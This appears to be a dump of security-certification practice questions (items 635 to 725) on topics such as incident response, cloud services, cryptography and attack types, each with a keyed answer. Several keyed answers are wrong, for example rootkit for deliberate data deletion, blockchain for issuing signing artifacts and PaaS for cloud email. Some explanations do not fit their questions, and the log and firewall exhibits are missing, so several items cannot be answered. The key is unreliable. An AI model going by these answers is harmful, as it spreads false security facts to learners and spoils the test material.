A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:






The administrator terminates the timeAttend.exe, observes system performance over the next few days and notices that the system performance does not degrade. Which of the following issues is MOST likely occurring?

A. DLL injection 
B. API attack
C. Buffer overflow 
D. Memory leak

Answer: D

The function malloc is used to allocate a certain amount of memory during the execution of a program. 
The malloc function will request a block of memory from the heap. 
If the request is granted, the operating system will reserve the requested amount of memory.

Starting with Windows Internet Explorer 7 on Windows Vista, the Internet control panel item includes an Enable memory protection option to help mitigate online attacks. This option is also referred to as Data Execution Prevention (DEP) or No-Execute (NX). When this option is enabled, it works with the processor to help prevent buffer overflow attacks by blocking code execution from memory that is marked as non-executable.

END
QUESTION 635
Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?

A. The business continuity plan 
B. The retention policy
C. The disaster recovery plan 
D. The incident response plan

Answer: A

END
QUESTION 636 
A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?

A. Logic Bomb 
B. Ransomware 
C. Fileless virus
D. Remote access Trojans 
E. Rootkit

Answer: E

END
QUESTION 637
Digital signatures use asymmetric encryption. This means the message is encrypted with:

A. the senders private key and decrypted with the senders' public key 
B. the senders public key and decrypted with the senders' private key 
C. the senders private key and decrypted with the recipient's public key 
D. the senders public key and decrypted with the recipient's private key

Answer: A

 
END
QUESTION 638
A help desk technician receives a phone call from someone claiming to be a part of the organization’s cybersecurity incident response team. The caller asks the technician to verify the networks internal firewall IP address. 
Which of the following is the technician’s BEST course of action?

A. direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.
B. ask for the caller’s name, verify the person’s identity in the email directory, and provide the requested information over the phone.
C. write down the phone number of the caller if possible, the name of the person requesting the information. Hang-up, and notify the organizations cybersecurity officer
D. request the caller send an email for identity verification and provide the requested information via email to the caller.

Answer: C

END
QUESTION 639
An employee received a word processing file that was delivered as an email attachment. 
The subject line and email content enticed the employee to open the attachment.
Which of the following attack vectors BEST matches this malware?

A. embedded Python code 
B. Macro-enabled file
C. Bash scripting
D. Credential-harvesting website

Answer: B

END
QUESTION 640
Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media retention policy?

A. putting security/antitamper tape over USB ports. Keylogging the port numbers and regularly inspecting the ports.
B. implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced
C. placing systems into locked key-controlled containers with no access to the USB ports. 
D. installing an endpoint agent to detect connectivity of USB and removable media

Answer: B

END
QUESTION 641 
The SOC for a large MSSP is in a meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of incident has become more common over weeks and is consuming large amounts of the analysts’ time due to manual tasks being performed. Which of the following solutions should the SOC consider to BEST improve its response time?

A. configure a NIDS appliance using a Switched Port Analyzer 
B. collect OSINT and catalog the artifacts in a central repository 
C. implement a SOAR with customizable playbooks
D. install a SIEM with community-driven threat intelligence

Answer: C

END
QUESTION 642
A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. 
A search of the WAF logs reveals the following output:






Which of the following is MOST likely occurring?

A. XSS attack 
B. SQLi attack 
C. Replay attack 
D. XSRF attack

Answer: B

END
QUESTION 643
Which of the following is an example of transference of risk?

A. purchasing insurance
B. patching vulnerable servers 
C. retiring outdated applications 
D. Application owner risk sign-off

Answer: A

END
QUESTION 644
A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which of the following technologies meets the requirement?

A. SSO 
B. IDS 
C. MFA 
D. TPM

Answer: C

END
QUESTION 645
A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB device that should be inserted on any computer that is transmitting a transaction securely.
Which of the following is the BEST certificate for these requirements?

A. user certificate
B. self-signed certificate 
C. computer certificate 
D. root certificate

Answer: A

END
QUESTION 646
During a trial, a judge determined evidence gathered from a hard drive was not admissible. 
Which of the following BEST explains this reasoning?
209
A. the forensic investigator forgot to run a checksum on the disk image after creation.
B. the chain of custody form did not note time zone offsets between transportation regions. 
C. the computer was turned off, and a RAM image could not be taken at the same time.
D. the hard drive was not properly kept in an antistatic bag when it was moved.

Answer: A

END
QUESTION 647
A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. 
Which of the following would BEST allow a security analyst to have this ability?

A. SOAR 
B. SIEM
C. Log collectors
D. Network-attached storage

Answer: B

END
QUESTION 648
The chief information security officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are in place to protect customer data. 
Which of the following would be BEST for the third-party vendor to provide the CISO?

A. GDPR compliance attestation 
B. cloud security alliance materials 
C. SOC 2 type 2 report
D. NIST RMF workbooks

Answer: C

END
QUESTION 649
Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

A. Dynamic resource allocation 
B. High availably
C. Segmentation
D. Container security

Answer: A

END
QUESTION 650
Which of the following explains why RTO is included in a BIA?

A. it identifies the amount of allowable downtime for an application or system 
B. it prioritizes risks so the organization can allocate resources appropriately.
C. it monetizes the loss of an asset and determines a break even point for risk mitigation
D. it informs the backup approach so that the organization can recover data to a known time

Answer: A

Recovery time objective (RTO) is the period following a disaster that an individual IT system may remain offline. 
This represents the amount of time it takes to identify that there is a problem and then perform recovery 
(restore from backup or switch in an alternative system, for instance).

END
QUESTION 651

A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the internal network performance has degraded also. Which of the following MOST likely explains this behavior?

A. DNS poisoning 
B. MAC flooding 
C. DDoS attack 
D. ARP poisoning

Answer: C

END
QUESTION 652
A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

A. legal hold
B. chain of custody
C. data loss prevention 
D. content filter

Answer: A

Once an organization is aware that it needs to preserve evidence for a court case, it must do so. The mechanism is fairly simple as well: once you realize your organization needs to preserve evidence, you must use a legal hold, or litigation hold, which is the process by which you properly preserve any and all digital evidence related to a potential case.

END
QUESTION 653
A company recently moved into a new annex of the building. Following the move, the help desk received reports of weak Wi-Fi signals from users in that part of the building. Which of the following is the MOST likely cause of this issue?

A. WAP placement 
B. Channel overlap 
C. captive portals 
D. AP security

Answer: A



END
QUESTION 654 
Which of the following is a benefit of including a risk management framework into an organization’s security approach?
A. it defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner.
B. it defines specific vendor products that have been tested and approved for use in a secure environment
C. it provides legal assurances and remedies in the event a data breach occurs.
D. it incorporates control development, policy, and management activities into IT operations.
211
Answer: D

END
QUESTION 655
A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. 
The goal is to allow only encrypted communications without relying on devices. 
Which of the following can be implemented?

A. HTTP security header
B. DNSSEC implementation 
C. SRTP
D. S/MIME

Answer: A

OWASP hosted the Secure Headers Project (https://owasp.org/www-project-secure-headers/), which includes detailed recommendations on what to include in response headers. Some headers that are commonly recommended as a best practice are: HTTP Strict-Transport-Security. This tells the browser to display the page only if it is sent as HTTP Secure (HTTPS). It includes the max- age=SECONDS and the includeSubDomains values.

END
QUESTION 656
An IT security manager requests a report on company information that is publicly available. 
The manager’s concern is that malicious actors will be able to access the data without active reconnaissance. 
Which of the following is the most efficient approach to perform the analysis?

A. Provide a domain parameter to the harvester tool 
B. check public DNS entries using dnsenum
C. perform a Nessus vulnerability scan targeting a public company’s IP 
D. execute Nmap using the options: scan all ports and sneaky mode

Answer: A

TheHarvester is a tool for gathering open-source intelligence (OSINT) for a particular domain or company name (github.com/laramies/theHarvester). It works by scanning multiple public data sources to gather emails, names, subdomains, 
IPs, URLs and other relevant data.

Dnsenum - While you can use tools such as dig and whois to query name records and hosting details and to check that external DNS services are not leaking too much information, a tool such as dnsenum packages a number of tests into a single query (github.com/fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can try to work out the IP address ranges that are in use.

END
QUESTION 657
Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?

A. EOL 
B. SLA 
C. MOU 
D. EOSL

Answer: B

When a manufacturer discontinues sales of a product, it enters an end of life (EOL) phase in which support and availability 
of spares and updates become more limited. An end of service life (EOSL) system is one that is no longer supported by its developer or vendor. EOSL products no longer receive security updates and so represent a critical vulnerability if any remain 
in active use.

END
QUESTION 658
A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against corporate credentials. Which of the following controls was being violated?

A. password complexity 
B. Password history
C. password reuse 
D. password length

Answer: A

END
QUESTION 659
A technician enables full disk encryption on a laptop that will be taken on a business trip. 
Which of the following does this process BEST protect?

A. data in transit
B. data in processing 
C. data at rest
D. data tokenization

Answer: C

END
QUESTION 660 
A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the following commands could an analyst run to find requested servers?

A. nslookup 10.10.10.0
B. nmap -p 80 10.10.10.0/24 
C. pathping 10.10.10.0 -p 80 
D. nc -l -p 80
3
Answer: B

END
QUESTION 661
A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which of the following is the most enforced security control to mitigate this risk?

A. block access to application stores 
B. implement OTA updates
C. update the BYOD policy 
D. Deploy a uniform firmware

Answer: A

END
QUESTION 662 
A company labeled some documents with the public sensitivity classification. 
This means the documents can be accessed by?

A. employees of other companies
B. all members of the department that created the documents
C. only the company's employees and those listed in the document 
D. only the individuals listed in the documents

Answer: A

https://safecomputing.umich.edu/protect-the-u/safely-use-sensitive-data/examples-by-level


END
QUESTION 663
A security engineer is building a file transfer solution to send files to a business partner. 
The users would like to drop off the files in a specific directory and have the server send to the business partner. 
The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

A. S/MIME 
B. LDAPS 
C. SSH
D. SRTP

Answer: C

END
QUESTION 664
A security incident has been resolved. 
Which of the following BEST describes the importance of the final phase of the incident response plan?

A. it examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
B. it returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
C. it identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
D. it contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

Answer: A

END
QUESTION 665
A business operations manager is concerned a PC that is critical to business operations will have a costly hardware failure soon. The manager is looking for options to continue business operations without incurring large costs. 
Which of the following would mitigate the managers concerns?

A. implement a full system upgrade.
B. perform a physical-to-virtual migration. 
C. Install uninterruptible power supplies.
D. purchase cybersecurity insurance.

Answer: B

END
QUESTION 666
An engineer recently deployed a group of 100 web servers in a cloud environment. 
Per the security policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?

A. Application allow list 
B. SWG
C. Host-based firewall 
D. VPN

Answer: C

END
QUESTION 667
A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services.
Which of the following would BEST allow the company to meet this requirement?

A. laaS 
B. PaaS 
C. MaaS 
D. SaaS

Answer: C

MaaS (monitoring as a service) Cloud service providing ongoing security and availability monitoring of on-premises 
and/or cloud-based hosts and services.

END
QUESTION 668
Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?

A. Recovery 
B. Deterrent 
C. Corrective 
D. Detective

Answer: D

END
QUESTION 669
The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a data breach occurs.
Which of the following is the BEST solution to meet the requirement?

A. Tokenization 
B. Masking
C. Full disk encryption 
D. Mirroring

Answer: A

Data tokenization replaces sensitive data elements with a token. The token is a substitute value used in place of the sensitive data. A tokenization system can convert the token back into its original form. Consider credit card information stored on a mobile phone and used for payments at point of sale (POS) terminals, such as terminals at fast-food stores. When users first configure a phone app, their phone passes credit card data to a tokenization system and requests a token. This tokenization system stores the token and the credit card data. When a user makes a charge, the phone app sends the token to the credit card processor. The credit card processor then sends the token to the tokenization system to retrieve the credit card data and processes the charge. The important point here is that the credit card data is never used directly at POS terminals. Years ago, point of sale terminals often sent credit card data over wireless networks allowing attackers to intercept them.

END
QUESTION 670
A SOC operator is analyzing a log file that contains the following entries:







A. SQL injection and improper input-handling attempts 
B. Cross-site scripting and resource exhaustion attempts 
C. Command injection and directory traversal attempts
D. Error handling and privilege escalation attempts

Answer: C

END
QUESTION 671
Which of the following actions would be recommended to improve an incident response process?

A. Train the team to identify the difference between events and incidents.
B. Modify access so the IT team has full access to the compromised assets 
C. Contact the authorities if a cybercrime is suspected.
D. Restrict communication surrounding the response to the IT team.

Answer: A

END
QUESTION 672
An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use their personal computers or they will be provided organization assets. 
Either way no data or applications will be installed locally on any user systems. 
Which of the following mobile solutions would accomplish these goals?

A. VDI 
B. MDM 
C. COPE 
D. UTM

Answer: A

VDE (virtual desktop environment) The user desktop and software applications provisioned as an instance under VDI.

END
QUESTION 673
The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS applications to be blocked from user access.
Which of the following is the BEST security solution to reduce this risk?

A. CASB
B. VPN concentrator 
C. MFA
D. VPC endpoint

Answer: A

END
QUESTION 674
Which of the following would BEST provide detective and corrective controls for thermal regulation?

A. A smoke detector 
B. A fire alarm
C. An HVAC system
D. A fire suppression system 
E. Guards

Answer: C

END
QUESTION 675
Which of the following statements BEST describes zero-day exploits?

A. When a zero-day exploit is discovered, the system cannot be protected by any means. 
B. Zero-day exploits have their own scoring category in CVSS.
C. A zero-day exploit is initially undetectable and no patch for it exists
D. Discovering zero-day exploits is always performed via bug bounty programs

Answer: C

END
QUESTION 676 
An organization discovered files with proprietary financial data have been deleted.
The files have been recovered from backup but every time the Chief Financial Officer logs in to the file server, 
the same files are deleted again. No other users are experiencing this issue. 
Which of the following types of malware is MOST likely causing this behavior?

A. Logic bomb
B. Crypto malware 
C. Spyware
D. Remote access Trojan

Answer: A

END
QUESTION 677
An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, 
the number of devices that were replaced due to loss damage or theft steadily increased by 10%. 
Which of the following would BEST describe the estimated number of devices to be replaced next year?

A. ALE 
B. ARO 
C. RPO 
D. SLE

Answer: B

END
QUESTION 678
Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation 
B. Confidentiality 
C. Availably
D. Authentication

Answer: A

END
QUESTION 679
An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines to identify any gaps.
Which of the following control types has the organization implemented?

A. Compensating 
B. Corrective
C. Preventive 
D. Detective

Answer: D

END
QUESTION 680
A company wants to improve end users’ experiences when they log in to a trusted partner website.
The company does not want the users to be issued separate credentials for the partner website. 
Which of the following should be implemented to allow users to authenticate using their own credentials 
to log in to the trusted partner's website?

A. Directory service 
B. AAA server
C. Federation
D. Multifactor authentication

Answer: C

END
QUESTION 681
Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs. 
B. Take a memory snapshot of the running system.
C. Use NetFlow to identify command-and-control IPs. 
D. Run a full on-demand scan of the root volume.

Answer: B

END
QUESTION 682
A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials?

A. MFA
B. Lockout
C. Time-based logins 
D. Password history

Answer: A

END
QUESTION 683
A user is attempting to navigate to a website from inside the company network using a desktop. 
When the user types in the URL. https://www.site.com, the user is presented with a certificate mismatch 
warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. 
Which of the following describes this attack?

A. On-path
B. Domain hijacking 
C. DNS poisoning 
D. Evil twin

Answer: C

END
QUESTION 684
A new company wants to avoid channel interference when building a WLAN. The company needs to know the radio frequency behavior, identify dead zones, and determine the best place for access points. 
Which of the following should be done FIRST?

A. Configure heat maps. 
B. Utilize captive portals. 
C. Conduct a site survey. 
D. Install Wi-Fi analyzers.

Answer: C

Site Surveys and Heat Maps
The coverage and interference factors mean that WAPs must be positioned and configured so that the whole area is covered, but that they overlap as little as possible. A site survey is used to measure signal strength and channel usage throughout the area to cover. A site survey starts with an architectural map of the site, with features that can cause background interference marked. These features include solid walls, reflective surfaces, motors, microwave ovens, and so on. The survey is performed with a Wi-Fi-enabled laptop or mobile device with Wi-Fi analyzer software installed. The Wi-Fi analyzer records information about the signal obtained at regularly spaced points as the surveyor moves around the area. These readings are combined and analyzed to produce a heat map, showing where a signal is strong (red) or weak (green/blue), and which channel is being used and how they overlap. This data is then used to optimize the design, by adjusting transmit power to reduce a WAP's range, changing the channel on a WAP, adding a new WAP, or physically moving a WAP to a new location.

END
QUESTION 685
Which of the following tools is effective in preventing a user from accessing unauthorized removable media?

A. USB data blocker 
B. Faraday cage
C. Proximity reader 
D. Cable lock

Answer: A

END
QUESTION 686
An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. 
Which of the following solutions should the engineer implement?

A. Proxy server 
B. WAF
C. Load balancer 
D. VPN

Answer: B

END
QUESTION 687
After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall policies would be MOST secure for a web server?

A.







B.





C.




D.





Answer: D

END
QUESTION 688
A user enters a username and a password at the login screen for a web portal. 
A few seconds later the following message appears on the screen: 
Please use a combination of numbers, special characters, and letters in the password field.
Which of the following concepts does this message describe?

A. Password complexity 
B. Password reuse
C. Password history 
D. Password age

Answer: A

END
QUESTION 689
Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator's folder on the web server. Which of the following attacks explains what occurred? (Select TWO)

A. Pass-the-hash
B. Directory traversal 
C. SQL injection
D. Privilege escalation 
E. Cross-site scripting 
F. Request forgery

Answer: BD

END
QUESTION 690
Which of the following is the MOST effective control against zero-day vulnerabilities?

A. Network segmentation 
B. Patch management
C. Intrusion prevention system 
D. Multiple vulnerability scanners

Answer: C

END
QUESTION 691
Which of the following organizations sets frameworks and controls for optimal security configuration on systems?

A. ISO 
B. GDPR
C. PCI DSS 
D. NIST

Answer: D

NIST SP 800-53 provides a list of controls that support the development of secure and resilient federal information systems. These controls are the operational, technical, and management standards and guidelines used by information systems to maintain confidentiality, integrity, and availability.

END
QUESTION 692
Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A. Persistence
B. Buffer overflow
C. Privilege escalation 
D. Pharming

Answer: C

END
QUESTION 693
Which of the following is a known security risk associated with data archives that contain financial information?

A. Data can become a liability if archived longer than required by regulatory guidance 
B. Data must be archived off-site to avoid breaches and meet business requirements 
C. Companies are prohibited from providing archived data to e-discovery requests
D. Unencrypted archives should be preserved as long as possible and encrypted

Answer: A

END
QUESTION 694
A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

A. Dual supply 
B. Generator 
C. UPS
D. PDU
E. Daily backups

Answer: B

END
QUESTION 695
An organization has activated an incident response plan due to a malware outbreak on its network. 
The organization has brought in a forensics team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to prevent reinfection from the initial infection vector?

A. Prevent connections over TFTP from the internal network
B. Create a firewall rule that blocks port 22 from the internet to the server 
C. Disable file sharing over port 445 to the server
D. Block port 3389 inbound from untrusted networks

Answer: D

END
QUESTION 696
A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls.
Which of the following should be implemented to BEST address the CSO's concerns? (Select TWO)

A. WAF 
B. CASB
C. NG-SWG 
D. Segmentation 
E. Encryption
F. Containerization

Answer: AB

END
QUESTION 697
Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city and the mobile phones are not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Which of the following technologies would BEST meet these requirements?

A. Geofencing
B. Mobile device management 
C. Containerization
D. Remote wiping

Answer: B

END
QUESTION 698
During a recent incident an external attacker was able to exploit an SMB vulnerability over the internet.
Which of the following action items should a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs 
B. Install AV on the affected server
C. Block unneeded TCP 445 connections 
D. Deploy a NIDS in the affected subnet

Answer: C

END
QUESTION 699
Business partners are working on a security mechanism to validate transactions securely. 
The requirement is for one company to be responsible for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is the BEST solution to adopt? 

A. PKI
B. Blockchain 
C. SAML
D. OAuth

Answer: B

END
QUESTION 700
A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by other applications also used by the finance department.
Which of the following account types Is MOST appropriate for this purpose?

A. Service 
B. Shared 
C. Generic 
D. Admin

Answer: A

Service accounts are used by scheduled processes and application server software, such as databases. Windows has several default service account types. These do not accept user interactive logons but can be used to run processes and background services:

> System—has the most privileges of any Windows account. The local system account creates the host processes that start Windows before the user logs on. Any process created using the system account will have full privileges over the local computer.

> Local Service—has the same privileges as the standard user account. 
It can only access network resources as an anonymous user.

END
QUESTION 701
An organization has developed an application that needs a patch to fix a critical vulnerability. 
In which of the following environments should the patch be deployed LAST?

A. Test
B. Staging
C. Development 
D. Production

Answer: D

END
QUESTION 702
Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?

A. Acceptance 
B. Transference 
C. Avoidance 
D. Mitigation

Answer: D

END
QUESTION 703
A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards. Which of the following is the company's data protection officer MOST likely concerned?

A. NIST Framework 
B. ISO 27001
C. GDPR 
D. PCI-DSS

Answer: C

END
QUESTION 704
Several users have opened tickets with the help desk. The help desk has reassigned the tickets to a security analyst for further review. The security analyst reviews the following metrics:






Which of the following is MOST likely the result of the security analyst's review?

A. The ISP is dropping outbound connections
B. The user of the Sales-PC fell for a phishing attack 
C. Corporate PCs have been turned into a botnet
D. An on-path attack is taking place between PCs and the router

Answer: C

END
QUESTION 705
A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal behavior is detected.
Which of the following is the security analyst MOST likely implementing?

A. Vulnerability scans
B. User behavior analysis
C. Security orchestration, automation, and response 
D. Threat hunting

Answer: B

END
QUESTION 706
Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?

A. CVSS 
B. SIEM 
C. SOAR 
D. CVE

Answer: A

END
QUESTION 707
A Chief Information Security Officer has defined resiliency requirements for a new data center architecture.
The requirements are as follows:

- Critical fileshares will remain accessible during and after a natural disaster
- Five percent of hard disks can fail at any given time without impacting the data.
- Systems will be forced to shut down gracefully when battery levels are below 20%

Which of the following are required to BEST meet these objectives? (Select THREE)

A. Fiber switching 
B. laC
C. NAS 
D. RAID 
E. UPS
F. Redundant power supplies 
G. Geographic dispersal
H. Snapshots
I. Load balancing

Answer: DEG

The use of cloud technologies encourages the use of scripted approaches to provisioning, rather than manually making configuration changes, or installing patches. An approach to infrastructure management where automation and orchestration 
fully replace manual configuration is referred to as infrastructure as code (IaC). One of the goals of IaC is to eliminate 
snowflake systems. A snowflake is a configuration or build that is different from any other. The lack of consistency, or drift,
in the platform environment leads to security issues, such as patches that have not been installed, and stability issues, such as scripts that fail to run because of some small configuration difference. By rejecting manual configuration of any kind, IaC ensures idempotence. 
Idempotence means that making the same call with the same parameters will always produce the same result. Note that IaC is not simply a matter of using scripts to create instances. Running scripts that have been written ad hoc is just as likely to cause environment drift as manual configuration. IaC means using carefully developed and tested scripts and orchestration runbooks to generate consistent builds.

END
QUESTION 708
A systems analyst is responsible for generating a new digital forensics chain of custody form. 
Which of the following should the analyst include in this documentation? (Select TWO).

A. The order of volatility 
B. A CRC32 checksum
C. The provenance of the artifacts 
D. The vendor's name
E. The date & time
F. A warning banner

Answer: CE

It is vital that the evidence collected at the crime scene conform to a valid timeline. Digital information is susceptible 
to tampering, so access to the evidence must be tightly controlled. Recording the whole process establishes 
the provenance of the evidence as deriving directly from the crime scene.

END
QUESTION 709
A forensic analyst needs to prove that data has not been tampered with since it was collected. 
Which of the following methods will the analyst MOST likely use?

A. Look for tampering on the evidence collection bag.
B. Encrypt the collected data using asymmetric encryption.
C. Ensure proper procedures for chain of custody are being followed 
D. Calculate the checksum using a hashing algorithm.

Answer: D

END
QUESTION 710
An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater than the five-year cost of the insurance policy. The organization is enabling risk:

A. avoidance 
B. acceptance 
C. mitigation 
D. transference

Answer: D

END
QUESTION 711
Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors 
for an internet-facing application?

A. Intellectual property theft 
B. Elevated privileges
C. Unknown backdoor 
D. Quality assurance

Answer: C

END
QUESTION 712
A company is auditing the manner in which its European customers' personal information is handled.
Which of the following should the company consult?

A. GDPR 
B. ISO 
C. NIST
D. PCI DSS

Answer: A

END
QUESTION 713
A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls
B. Compensating controls 
C. Deterrent controls
D. Detective controls

Answer: C

END
QUESTION 714
An administrator needs to protect user passwords and has been advised to hash the passwords. 
Which of the following BEST describes what the administrator is being advised to do?

A. Perform a mathematical operation on the passwords that will convert them into unique strings.
B. Add extra data to the passwords so their length is increased, making them harder to brute force.
C. Store all passwords in the system in a rainbow table that has a centralized location. 
D. Enforce the use of one-time passwords that are changed for every login session.

Answer: A

END
QUESTION 715
Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions and policies based on location, role, and service level?

A. Standard naming conventions 
B. Domain services
C. Baseline configurations 
D. Diagrams

Answer: A

END
QUESTION 716
Which of the following terms describes a broad range of information that is sensitive to a specific organization?

A. Public
B. Top secret 
C. Proprietary 
D. Open-source

Answer: C

END
QUESTION 717
Which of the following would be indicative of a hidden audio file found inside of a piece of source code?

A. Steganography
B. Homomorphic encryption 
C. Cipher suite
D. Blockchain

Answer: A

Most symmetric algorithm cipher suites use either a block cipher or a stream cipher. They are both symmetric, 
so they both use the same key to encrypt or decrypt data. However, they divide data in different ways.

END
QUESTION 718
A software company adopted the following processes before releasing software to production:

- Peer review
- Static code scanning 
- Signing

A considerable number of vulnerabilities are still being detected when code is executed in production.
Which of the following security tools can improve vulnerability detection in this environment?

A.	File integrity monitoring for the source code 
B. Dynamic code analysis tool
C. Encrypted code repository
D. Endpoint detection and response solution

Answer: B

END
QUESTION 719
An organization is migrating several SaaS applications that support SSO. 
The security manager wants to ensure the migration is completed securely.
Which of the following should the organization consider before implementation? (Select TWO).
 
A. The back-end directory source 
B. The identity federation protocol 
C. The hashing method
D. The encryption method 
E. The registration authority 
F. The certificate authority

Answer: CD

END
QUESTION 720
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:


Which of the following was MOST likely observed?

A. DLL injection 
B. Session replay 
C. SQL injection
D. XSS

Answer: D

END
QUESTION 721
During a security incident investigation, an analyst consults the company's SIEM and sees an event concerning high traffic to a known, malicious command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which of the following can provide the information?

A. WAF logs 
B. DNS logs 
C. System logs
D. Application logs

Answer: B

END
QUESTION 722
A security engineer is deploying a new wireless for a company. The company shares office space with multiple tenants. Which of the following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?

A. EAP 
B. TLS
C. HTTPS 
D. AES

Answer: D

Neither WEP nor the original WPA version are considered secure enough for continued use. WPA2 uses the Advanced Encryption Standard (AES) cipher with 128-bit keys, deployed within the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). AES replaces RC4 and CCMP replaces TKIP. CCMP provides authenticated encryption, which is designed to make replay attacks harder.
Weaknesses have also been found in WPA2, however, which has led to its intended replacement by WPA3. The main features of WPA3 are as follows:

> Simultaneous Authentication of Equals (SAE)—replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on Diffie-Hellman key agreement.
> Enhanced Open—enables encryption for the open authentication method.
> Updated cryptographic protocols—replaces AES CCMP with the AES Galois Counter

Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must
use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.
> Management protection frames—mandates use of these to protect against key recovery attacks.

END
QUESTION 723
A company wants the ability to restrict web access and monitor the websites that employees visit. 
Which of the following would BEST meet these requirements?

A. internet proxy 
B. VPN
C. WAF 
D. Firewall

Answer: A

A proxy server is a system or router that provides a gateway between users and the internet. Therefore, it helps prevent cyber attackers from entering a private network. It is a server, referred to as an “intermediary” because it goes between end-users and the web pages they visit online.

END
QUESTION 724
A Chief Information Security Officer wants to ensure the organization is validating and checking the Integrity of zone transfers. Which of the following solutions should be implemented?

A. DNSSEC 
B. LDAPS 
C. NGFW 
D. DLP

Answer: A

Zone transfers occur between Primary and Secondary DNS servers using TCP Port 53.

END
QUESTION 725
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data.
Which of the following cloud services would BEST accommodate the request?

A. laas 
B. Paas 
C. Daas 
D. SaaS

Answer: B

https://www.microsoft.com/en-us/microsoft-365/business-insights-ideas/resources/5-ways-cloud-email-must-have-for-your-business

5 ways cloud email hosting is a must-have for your business
Microsoft 365 Team
